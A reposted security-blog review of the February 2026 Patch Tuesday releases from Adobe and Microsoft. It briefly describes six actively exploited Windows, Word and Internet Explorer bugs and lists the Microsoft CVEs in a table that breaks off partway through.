<guid isPermaLink="true">https://tsecurity.de/de/3694474/it-security-nachrichten/the-february-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I have survived the biggest Pwn2Own ever, but I’m back in Tokyo for the second Patch Tuesday of 2026. My location never stops Patch Tuesday from coming, so let’s take a look at the latest security patches from Adobe and Microsoft.  If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for February 2026</strong></p><p class="">For February, Adobe released nine bulletins addressing 44 unique CVEs in Adobe Audition, After Effects, InDesign, Substance 3D Designer, Substance 3D Stager, Adobe Bridge, Substance 3D Modeler, Lightroom Classic, and the Adobe DNG Software Development Kit (SDK). The largest update here is for <a href="https://helpx.adobe.com/security/products/after_effects/apsb26-15.html">After Effects</a>, which fixes 13 Critical and two Important rated bugs. The patch for <a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb26-19.html">Substance 3D Designer</a> is on the larger side with seven fixes, but only two of those are Critical. On the other hand, the fix for <a href="https://helpx.adobe.com/security/products/substance3d_stager/apsb26-20.html">Substance 3D Stager</a> corrects five Critical-rated bugs that could lead to code execution. The <a href="https://helpx.adobe.com/security/products/audition/apsb26-14.html">Audition</a> patch fixes six bugs, but only one is Critical.</p><p class="">The other patches are smaller in size. The fix for the <a href="https://helpx.adobe.com/security/products/dng-sdk/apsb26-23.html">Adobe DNG Software Development Kit (SDK)</a> corrects two Critical and two Important-rated bugs. The <a href="https://helpx.adobe.com/security/products/indesign/apsb26-17.html">InDesign</a> patch fixes three bugs, but only one is Critical. The update for <a href="https://helpx.adobe.com/security/products/bridge/apsb26-21.html">Adobe Bridge</a> fixes two Critical bug that could lead to code execution. The patch for <a href="https://helpx.adobe.com/security/products/lightroom/apsb26-06.html">Lightroom Classic</a> addresses a single Critical bug, and the release is wrapped up with a patch for <a href="https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-22.html">Substance 3D Modeler</a> that fixes a single, Important-rated memory link.</p><p class="">None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release, and all of the updates released by Adobe this month are listed as deployment priority 3.</p><p class=""><strong>Microsoft Patches for February 2026</strong></p><p class="">This month, Microsoft drops 58 new CVEs in Windows and Windows components, Office and Office Components, Azure, Microsoft Edge (Chromium-based), .NET and Visual Studio, GitHub Copilot, Mailslot FS, Exchange Server, Internet Explorer (!), Power BI, Hyper-V Server, and the Windows Subsystem for Linux. Counting the third-party and Chromium updates listed in the release, it brings the total number of CVEs to 62. One of the bugs in the Windows Graphics component was submitted through the ZDI program. Five of these bugs are rated Critical, two are rated Moderate, and the rest are rated Important in severity.</p><p class="">It’s typical to see this number of CVEs released in February, but the number of bugs under active attack is extraordinarily high. Microsoft lists six bugs being exploited at the time of release, with three of these listed as publicly known. Last month only had a single bug being exploited, although there were twice as many CVEs patched. We’ll see if we’re on our way to another “hot exploit summer” as we saw a few years ago or if this is just an aberration. </p><p class="">Let’s take a closer look at some of the more interesting updates for this month, starting with the bugs under active attack: </p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510"><strong>CVE-2026-21510</strong></a><strong> - Windows Shell Security Feature Bypass Vulnerability<br></strong>This bug is listed as a security feature bypass, but it could also be classified as code execution. An attacker can bypass Windows SmartScreen and Windows Shell security prompts to execute code on a target system. This bug is also listed as publicly known, but Microsoft doesn’t say where. There is user interaction here, as the client needs to click a link or a shortcut file. Still, a one-click bug to gain code execution is a rarity. Definitely test and deploy this fix quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514"><strong>CVE-2026-21514</strong></a><strong> - Microsoft Word Security Feature Bypass Vulnerability<br></strong>This bug also requires user interaction in the form of opening a Word document, but that’s all that’s required to bypass protections to dangerous COM/OLE controls. Thankfully, the Preview Pane is <em>not</em> an attack vector here. However, users are well known to open lots of documents they receive in e-mail. This bypass could also result in code execution if the right COM/OLE control is hit. This is also listed as publicly known, so add this to the list to test and deploy quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519"><strong>CVE-2026-21519</strong></a><strong> - Desktop Window Manager Elevation of Privilege Vulnerability<br></strong>This is the second month in a row that a DWM was listed as being exploited in the wild. That leads me to believe the first patch didn’t completely resolve the vulnerability. Same as last month, this bug allows attackers to run code with SYSTEM privileges. Bugs of this type are typically paired with a code execution bug to take over a system. As always, Microsoft offers no indication of how widespread these exploits may be.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533"><strong>CVE-2026-21533</strong></a><strong> - Windows Remote Desktop Services Elevation of Privilege Vulnerability<br></strong>Don’t let the word “Remote” in the title fool you – this is a local bug that allows attackers to run code with SYSTEM privileges. It’s interesting that Microsoft lists “Improper privilege management” as the root cause for this issue. If the system is running Remote Desktop Services, it’s probably a juicy target for attackers to move laterally after an initial breach. Add this one to the list of patches to test and deploy immediately.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513"><strong>CVE-2026-21513</strong></a><strong> - Internet Explorer Security Feature Bypass Vulnerability<br></strong>Although long gone by many measurements, IE does still exist on Windows systems, and calling it always results in a vulnerability somehow. This bug manifests similarly to the Shell bug above, as it requires user interaction but could result in code execution. The bypass here is simply the ability to reach IE, which shouldn’t be possible. Again, test and deploy this fix quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525"><strong>CVE-2026-21525</strong></a><strong> - Windows Remote Access Connection Manager Denial of Service Vulnerability<br></strong>It’s unusual to see DoS bugs being used in active attacks, but that’s what we have here. A null pointer deref in the Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally. Most null pointer derefs cause the application or service to crash, but it’s not clear if it will automatically restart. I would exercise caution and patch quickly either way.</p><p class="">Here’s the full list of CVEs released by Microsoft for February 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="2026_PatchTable-Feb.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="953">
 <col width="151" class="xl69">
 <col width="263" class="xl72">
 <col width="111" class="xl71" span="4">
 <col width="95" class="xl71">
 <tr height="48">
  <td width="151" class="xl69" height="48"><span> </span>CVE<span> </span></td>
  <td width="263" class="xl72"><span> </span>Title<span> </span></td>
  <td width="111" class="xl71"><span> </span>Severity<span> </span></td>
  <td width="111" class="xl71"><span> </span>CVSS<span> </span></td>
  <td width="111" class="xl71"><span> </span>Public</td>
  <td width="111" class="xl71"><span> </span>Exploited<span> </span></td>
  <td width="95" class="xl71"><span> </span>TYPE<span> </span></td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514"><span><span> </span>CVE-2026-21514<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Word Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510"><span><span> </span>CVE-2026-21510<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Shell Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513"><span><span> </span>CVE-2026-21513<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Internet Explorer Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519"><span><span> </span>CVE-2026-21519<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Desktop Window Manager Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="72">
  <td class="xl74" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533"><span><span> </span>CVE-2026-21533<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Remote Desktop Services Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525"><span><span> </span>CVE-2026-21525<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Remote Access Connection Manager
  Denial of Service Vulnerability<span> </span></td>
  <td class="xl68"><span> </span>Moderate<span> </span></td>
  <td class="xl65">6.2</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21511"><span><span> </span>CVE-2026-21511<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Outlook Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-2804"><span><span> </span>CVE-2023-2804 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Red Hat, Inc. CVE-2023-2804: Heap Based
  Overflow libjpeg-turbo<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>Yes<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24302"><span><span> </span>CVE-2026-24302<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Arc Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">8.6</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24300"><span><span> </span>CVE-2026-24300<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Front Door Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">9.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21532"><span><span> </span>CVE-2026-21532<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Function Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">8.2</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21522"><span><span> </span>CVE-2026-21522<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft ACI Confidential Containers
  Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">6.7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23655"><span><span> </span>CVE-2026-23655<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft ACI Confidential Containers
  Information Disclosure Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21218"><span><span> </span>CVE-2026-21218<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>.NET and Visual Studio Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21512"><span><span> </span>CVE-2026-21512<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure DevOps Server Cross-Site Scripting
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">XSS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21529"><span><span> </span>CVE-2026-21529 †</span></a></td>
  <td width="263" class="xl75"><span> </span>Azure HDInsight Spoofing Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21528"><span><span> </span>CVE-2026-21528<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure IoT Explorer Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21228"><span><span> </span>CVE-2026-21228<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Local Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.1</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21531"><span><span> </span>CVE-2026-21531<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure SDK for Python Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">9.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21251"><span><span> </span>CVE-2026-21251<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Cluster Client Failover (CCF) Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20846"><span><span> </span>CVE-2026-20846<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GDI+ Denial of Service Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21523"><span><span> </span>CVE-2026-21523<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Code Remote
  Code Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21518"><span><span> </span>CVE-2026-21518<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Code
  Security Feature Bypass Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21257"><span><span> </span>CVE-2026-21257<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Elevation
  of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21256"><span><span> </span>CVE-2026-21256<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot and Visual Studio Remote Code
  Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21516"><span><span> </span>CVE-2026-21516<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>GitHub Copilot for Jetbrains Remote Code
  Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21253"><span><span> </span>CVE-2026-21253<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Mailslot File System Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21537"><span><span> </span>CVE-2026-21537 †</span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Defender for Endpoint Linux
  Extension Remote Code Execution Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21259"><span><span> </span>CVE-2026-21259<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21258"><span><span> </span>CVE-2026-21258<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21261"><span><span> </span>CVE-2026-21261<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Excel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21527"><span><span> </span>CVE-2026-21527<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Exchange Server Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21260"><span><span> </span>CVE-2026-21260<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Outlook Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21229"><span><span> </span>CVE-2026-21229<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Power BI Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21236"><span><span> </span>CVE-2026-21236<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21238"><span><span> </span>CVE-2026-21238<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21241"><span><span> </span>CVE-2026-21241<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Ancillary Function Driver for
  WinSock Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21517"><span><span> </span>CVE-2026-21517<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows App for Mac Installer Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21234"><span><span> </span>CVE-2026-21234<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Connected Devices Platform Service
  Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21235"><span><span> </span>CVE-2026-21235<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Graphics Component Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21246"><span><span> </span>CVE-2026-21246<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Graphics Component Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21232"><span><span> </span>CVE-2026-21232<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21240"><span><span> </span>CVE-2026-21240<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21250"><span><span> </span>CVE-2026-21250<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows HTTP.sys Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21244"><span><span> </span>CVE-2026-21244<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
